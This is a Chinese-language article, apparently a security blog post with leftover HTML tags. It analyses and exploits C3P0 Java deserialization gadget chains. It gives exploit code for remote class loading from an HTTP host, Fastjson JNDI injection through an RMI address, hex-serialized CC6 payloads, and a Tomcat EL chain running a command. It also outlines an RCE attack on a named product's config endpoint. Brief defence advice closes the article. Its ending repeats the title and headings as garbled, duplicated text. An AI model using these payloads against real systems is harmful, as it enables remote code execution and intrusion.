C3P0反序列化漏洞分析与利用<\/h1>

1. C3P0简介<\/h2>
C3P0是一个开源的JDBC连接池，实现了数据源和JNDI绑定，支持JDBC3规范和JDBC2的标准扩展。连接池技术用于复用数据库连接句柄，避免频繁创建和销毁连接带来的资源消耗。<\/p>

2. 漏洞环境<\/h2>

JDK版本：8u65<\/li>
C3P0版本：0.9.5.2<\/li>

依赖：

com.mchange:c3p0:0.9.5.2<\/code><\/li>
<\/ul>
3. C3P0常见利用方式<\/h2>
3.1 URLClassLoader远程类加载<\/h3>
利用链分析<\/h4>


关键方法<\/strong>：ReferenceableUtils.referenceToObject()<\/code><\/p>

该方法实现了类似URLClassLoader的类加载功能<\/li>
支持多种协议(file\/jar\/http)<\/li>
<\/ul>
<\/li>

调用链：<\/p>
PoolBackedDataSourceBase#readObject -> 
ReferenceSerialized#getObject -> 
ReferenceableUtils#referenceToObject -> 
ObjectFactory#getObjectInstance
<\/code><\/pre>
<\/li>

关键点<\/strong>：<\/p>

PoolBackedDataSourceBase<\/code>在序列化时会检查connectionPoolDataSource<\/code>属性是否可序列化<\/li>
如果不可序列化，会使用indirector.indirectForm<\/code>方法处理<\/li>
最终序列化的是ReferenceSerialized<\/code>对象<\/li>
<\/ul>
<\/li>
<\/ol>
EXP构造<\/h4>
public<\/span> class<\/span> c3p<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        PoolBackedDataSourceBase a =<\/span> new<\/span> PoolBackedDataSourceBase(<\/span>false<\/span>);<\/span>
<\/span><\/span>        Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase"<\/span>);<\/span>
<\/span><\/span>        Field f1 =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"connectionPoolDataSource"<\/span>);<\/span>
<\/span><\/span>        f1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        f1.<\/span>set<\/span>(<\/span>a,<\/span>new<\/span> evil());<\/span>
<\/span><\/span>
<\/span><\/span>        ObjectOutputStream ser =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>new<\/span> File(<\/span>"a.bin"<\/span>)));<\/span>
<\/span><\/span>        ser.<\/span>writeObject<\/span>(<\/span>a);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> static<\/span> class<\/span> evil<\/span> implements<\/span> ConnectionPoolDataSource,<\/span> Referenceable {<\/span>
<\/span><\/span>        \/\/ 省略接口方法实现...
<\/span><\/span><\/span><\/span>        
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> Reference getReference<\/span>()<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>            return<\/span> new<\/span> Reference(<\/span>"evilexp"<\/span>,<\/span>"evilexp"<\/span>,<\/span>"http:\/\/127.0.0.1:8888\/"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 JNDI注入<\/h3>
利用链分析<\/h4>


关键方法<\/strong>：JndiRefForwardingDataSource#dereference()<\/code><\/p>

存在明显的lookup<\/code>函数调用<\/li>
<\/ul>
<\/li>

调用链：<\/p>
setLoginTimeout -> 
getNestedDataSource -> 
dereference -> 
lookup
<\/code><\/pre>
<\/li>

利用条件<\/strong>：<\/p>

需要配合Fastjson或Jackson反序列化漏洞<\/li>
需要设置jndiName<\/code>属性<\/li>
<\/ul>
<\/li>
<\/ol>
Fastjson EXP<\/h4>
String payload =<\/span> "{"<\/span> +<\/span>
<\/span><\/span>    "\"@type\":\"com.mchange.v2.c3p0.JndiRefConnectionPoolDataSource\","<\/span> +<\/span>
<\/span><\/span>    "\"JndiName\":\"rmi:\/\/127.0.0.1:1099\/muogbv\", "<\/span> +<\/span>
<\/span><\/span>    "\"LoginTimeout\":0"<\/span> +<\/span>
<\/span><\/span>    "}"<\/span>;<\/span>
<\/span><\/span>JSON.<\/span>parse<\/span>(<\/span>payload);<\/span>
<\/span><\/span><\/code><\/pre>3.3 HEX序列化字节加载<\/h3>
利用原理<\/h4>


关键类<\/strong>：WrapperConnectionPoolDataSource<\/code><\/p>

构造方法中对userOverrides<\/code>属性的赋值存在特殊处理<\/li>
会解析十六进制字符串并反序列化<\/li>
<\/ul>
<\/li>

处理流程<\/strong>：<\/p>
userOverridesAsString -> 
C3P0ImplUtils.parseUserOverridesAsString -> 
hex解码 -> 
SerializableUtils.fromByteArray -> 
ObjectInputStream.readObject
<\/code><\/pre>
<\/li>

注意事项<\/strong>：<\/p>

需要在十六进制字符串头部加上HexAsciiSerializedMap:<\/code><\/li>
末尾需要加上;<\/code><\/li>
中间是序列化对象的十六进制表示<\/li>
<\/ul>
<\/li>
<\/ol>
EXP构造<\/h4>
public<\/span> class<\/span> Test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String hex =<\/span> toHexAscii(<\/span>tobyteArray(<\/span>CC6()));<\/span>
<\/span><\/span>        
<\/span><\/span>        String payload =<\/span> "{"<\/span> +<\/span>
<\/span><\/span>            "\"1\":{"<\/span> +<\/span>
<\/span><\/span>            "\"@type\":\"java.lang.Class\","<\/span> +<\/span>
<\/span><\/span>            "\"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\""<\/span> +<\/span>
<\/span><\/span>            "},"<\/span> +<\/span>
<\/span><\/span>            "\"2\":{"<\/span> +<\/span>
<\/span><\/span>            "\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\","<\/span> +<\/span>
<\/span><\/span>            "\"userOverridesAsString\":\"HexAsciiSerializedMap:"<\/span>+<\/span> hex +<\/span> ";\","<\/span> +<\/span>
<\/span><\/span>            "}"<\/span> +<\/span>
<\/span><\/span>            "}"<\/span>;<\/span>
<\/span><\/span>        JSON.<\/span>parse<\/span>(<\/span>payload);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ CC6利用链生成方法...
<\/span><\/span><\/span><\/span>    \/\/ 序列化转换方法...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.4 不出网利用(Tomcat EL表达式)<\/h3>
利用条件<\/h4>

需要Tomcat 8相关依赖环境<\/li>
利用BeanFactory<\/code>进行EL表达式注入<\/li>
<\/ul>
EXP构造<\/h4>
public<\/span> class<\/span> C3P0_Tomcat8<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> class<\/span> Tomcat8_Loader<\/span> implements<\/span> ConnectionPoolDataSource,<\/span> Referenceable {<\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> Reference getReference<\/span>()<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>            ResourceRef resourceRef =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>            resourceRef.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "faster=eval"<\/span>));<\/span>
<\/span><\/span>            resourceRef.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"faster"<\/span>,<\/span> "Runtime.getRuntime().exec(\"calc\")"<\/span>));<\/span>
<\/span><\/span>            return<\/span> resourceRef;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        \/\/ 省略其他方法...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 序列化和反序列化方法...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 实战案例分析<\/h2>
云安宝-云匣子config fastjson RCE<\/h3>
漏洞分析<\/h4>

入口点<\/strong>：\/3.0\/authService\/config<\/code>接口的Fastjson反序列化<\/li>
利用方式<\/strong>：使用C3P0的HEX序列化字节加载方式<\/li>
依赖版本<\/strong>：Fastjson 1.2.38<\/li>
利用链<\/strong>：CC6 + JS引擎加载恶意类<\/li>
<\/ol>
攻击流程<\/h4>

生成CC6的序列化payload<\/li>
转换为十六进制格式<\/li>
构造Fastjson payload通过C3P0加载<\/li>
最终执行JS引擎中的恶意代码实现回显<\/li>
<\/ol>
5. 防御建议<\/h2>

升级C3P0到最新安全版本<\/li>
避免在不可信环境中使用Fastjson等易受攻击的JSON库<\/li>
对反序列化操作进行严格的白名单控制<\/li>
网络层面限制出站连接<\/li>
使用安全产品监控可疑的JNDI和ClassLoader行为<\/li>
<\/ol>
6. 总结<\/h2>
C3P0反序列化漏洞主要通过三种方式利用：<\/p>

URLClassLoader远程加载恶意类<\/li>
JNDI注入<\/li>
HEX序列化字节加载<\/li>
<\/ol>
每种方式各有特点，攻击者可根据目标环境选择最适合的攻击方式。防御时需要从代码、配置和网络多个层面进行防护。<\/p>

C3P0反序列化漏洞分析与利用<\/h1>

1. C3P0简介<\/h2> C3P0是一个开源的JDBC连接池，实现了数据源和JNDI绑定，支持JDBC3规范和JDBC2的标准扩展。连接池技术用于复用数据库连接句柄，避免频繁创建和销毁连接带来的资源消耗。<\/p>

3. C3P0常见利用方式<\/h2>

3.1 URLClassLoader远程类加载<\/h3>

3.2 JNDI注入<\/h3>

3.3 HEX序列化字节加载<\/h3>

3.4 不出网利用(Tomcat EL表达式)<\/h3>

4. 实战案例分析<\/h2>

云安宝-云匣子config fastjson RCE<\/h3>

1. C3P0简介<\/h2>
C3P0是一个开源的JDBC连接池，实现了数据源和JNDI绑定，支持JDBC3规范和JDBC2的标准扩展。连接池技术用于复用数据库连接句柄，避免频繁创建和销毁连接带来的资源消耗。<\/p>